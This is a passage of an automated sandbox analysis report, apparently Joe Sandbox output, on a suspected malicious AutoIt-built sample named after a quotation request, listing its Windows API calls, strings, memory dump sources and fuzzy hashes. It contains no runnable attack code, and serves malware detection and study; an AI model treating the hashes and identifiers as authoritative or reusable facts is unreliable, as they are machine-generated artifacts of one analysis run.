                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: 594a1dcfc0bb3815cca3a067177b64d66f13cee0d2d40c7fec6884eaa8892110
                                                            • Instruction ID: e8514b556dbb54fc0708aa08b9db72d2a8435240be27621af2e2cba1b680598a
                                                            • Opcode Fuzzy Hash: 594a1dcfc0bb3815cca3a067177b64d66f13cee0d2d40c7fec6884eaa8892110
                                                            • Instruction Fuzzy Hash: 7FE0D877A0432867D720EAE5EC0AE97FBACFBA5760F010116F916D7241E678E641C7E0
                                                            APIs
                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007EA63F
                                                              • Part of subcall function 007D13F1: _doexit.LIBCMT ref: 007D13FB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: Message_doexit
                                                            • String ID: AutoIt$Error allocating memory.
                                                            • API String ID: 1993061046-4017498283
                                                            • Opcode ID: 982f227979fd56ed63ca74319319407fcf42aa8dffcb947e1252e7dde54bf055
                                                            • Instruction ID: 3a98e4b1bc32c5b71082f0920aef1971b968dda1f8ead78c49135d585af49367
                                                            • Opcode Fuzzy Hash: 982f227979fd56ed63ca74319319407fcf42aa8dffcb947e1252e7dde54bf055
                                                            • Instruction Fuzzy Hash: DFD02B313C4B1873C21437A83C0FFC43648DB55BA5F04001AFB08D62C249EE955001D9
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 0082ACC0
                                                            • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0082AEBD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: DirectoryFreeLibrarySystem
                                                            • String ID: WIN_XPe
                                                            • API String ID: 510247158-3257408948
                                                            • Opcode ID: 96bb95bc3864f38b8a8faf16a0602944445289c715a08bb0e38bd3b786b3d254
                                                            • Instruction ID: c3b9bc95bcea5fe8e260cd44156bc369b6976e9ac370ff05a1b786245d33e35c
                                                            • Opcode Fuzzy Hash: 96bb95bc3864f38b8a8faf16a0602944445289c715a08bb0e38bd3b786b3d254
                                                            • Instruction Fuzzy Hash: F8E0C970C006199FCB15DBA9E984AEDB7B9FF88301F148495E556F2160DB705A84DF22
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008186A2
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 008186B5
                                                              • Part of subcall function 007F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7AD0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 5aac3d6c05099e74ceb3647aa8400a704c16020662b525234c0c3f0182cf7705
                                                            • Instruction ID: 19d39d4a5b6ce1ba48bdd0df5a8b81189957aaea2c506796abc2f656afacec1d
                                                            • Opcode Fuzzy Hash: 5aac3d6c05099e74ceb3647aa8400a704c16020662b525234c0c3f0182cf7705
                                                            • Instruction Fuzzy Hash: 5AD0C971784318A7E2686770AC0FFD66A18AB54B11F110815B75AAA2D0C9A4A950C654
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008186E2
                                                            • PostMessageW.USER32(00000000), ref: 008186E9
                                                              • Part of subcall function 007F7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007F7AD0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1290471930.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                            • Associated: 00000001.00000002.1290450229.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290544379.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290596239.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000001.00000002.1290618867.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7b0000_RFQ 3100185 MAHAD.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 28ab949d916fcb4e1e0a3ec1d57515462ad558c3d9d0cfe75139d376c7388763
                                                            • Instruction ID: d08dcb8e5284b8968f51599d78cde043dd0d68df1138d01ab4ff309243bd08b3
                                                            • Opcode Fuzzy Hash: 28ab949d916fcb4e1e0a3ec1d57515462ad558c3d9d0cfe75139d376c7388763
                                                            • Instruction Fuzzy Hash: 9BD0C971785318ABE2686770AC0FFC66A18AB54B11F510815B756EA2D0C9A4A950C654